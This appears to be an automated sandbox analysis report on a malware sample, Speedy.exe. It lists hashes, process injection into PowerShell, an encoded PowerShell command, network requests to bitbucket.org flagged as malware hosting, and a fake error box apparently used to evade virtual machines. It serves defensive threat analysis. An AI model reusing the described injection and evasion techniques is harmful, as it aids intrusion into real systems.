Analysis
max time kernel: 118s
max time network: 120s
platform: windows7_x64
resource: win7-20240705-en
resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
submitted: 21-07-2024 19:24
Static task: static1
Behavioral task: behavioral1
  Sample: Speedy.exe
  Resource: win7-20240705-en
Behavioral task: behavioral2
  Sample: Speedy.exe
  Resource: win10v2004-20240709-en
General
Target: Speedy.exe
Size: 160KB
MD5: 7b9610cdb99b9973810e3e25e2548ba9
SHA1: 776ecee620560f31d35fbd9894737e7b4133d29a
SHA256: 1c0757e44587291a3152fe7c3ee1d49c64c5ad9bbfd2123a65a772783f0bc096
SHA512: 29d185e3dcd8bfadd3f8c30bf03ac57a44d10581859a6a449339b63e86be9d02c8a9382f27d82474006770afce8f1d80cb69acd8abc761656bd9cf3d2a4e3660
SSDEEP: 3072:Tu6Wqq2AkZytOeiibKnESWEA6eb7THe+fgy2MPSX16zhn9gkZkb/Xw:q69q2AgytuimESWEA7DfgynPSX1mn9ub
Malware Config
Signatures
Blocklisted process makes network request (4 IoCs)
Processes:
  flow  pid   process
  5     2364  powershell.exe
  6     2364  powershell.exe
  7     2364  powershell.exe
  8     2364  powershell.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 5 IoCs)
Processes:
  flow  ioc
  7     bitbucket.org
  8     bitbucket.org
  4     bitbucket.org
  5     bitbucket.org
  6     bitbucket.org

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes:
  pid   process
  2364  powershell.exe
  2364  powershell.exe
  2364  powershell.exe
  1892  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  description              pid   process
  Token: SeDebugPrivilege  3032  Speedy.exe
  Token: SeDebugPrivilege  2364  powershell.exe
  Token: SeDebugPrivilege  1892  powershell.exe

Suspicious use of WriteProcessMemory (6 IoCs)
Processes:
  description                          pid   process         target process
  PID 3032 wrote to memory of 2364     3032  Speedy.exe      powershell.exe
  PID 3032 wrote to memory of 2364     3032  Speedy.exe      powershell.exe
  PID 3032 wrote to memory of 2364     3032  Speedy.exe      powershell.exe
  PID 2364 wrote to memory of 1892     2364  powershell.exe  powershell.exe
  PID 2364 wrote to memory of 1892     2364  powershell.exe  powershell.exe
  PID 2364 wrote to memory of 1892     2364  powershell.exe  powershell.exe
Processes
C:\Users\Admin\AppData\Local\Temp\Speedy.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Speedy.exe"
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 3032
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 2364
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#quz#>[System.Windows.Forms.MessageBox]::Show('Error 401: No VPS is allowed!','','OK','Error')<#fxy#>;
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 1892
Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: c3e23a674037974ce33009b2973f2c23
  SHA1: 24c7a1c0d5b2ea895d56b52129ab4ca6f0e5b21e
  SHA256: ec3f82cbe08fbafcb66bb15a64c5c270eb097b8d42dbd7b720509451aa556507
  SHA512: ba1782aa7c2ec142000a7675ff4cf92481c9b6cd5e7a79578d987fde0b7febc7ba36b63e8811fe0031d95d9dc5dde9753b347a5b7436192ac1ba3b802039e296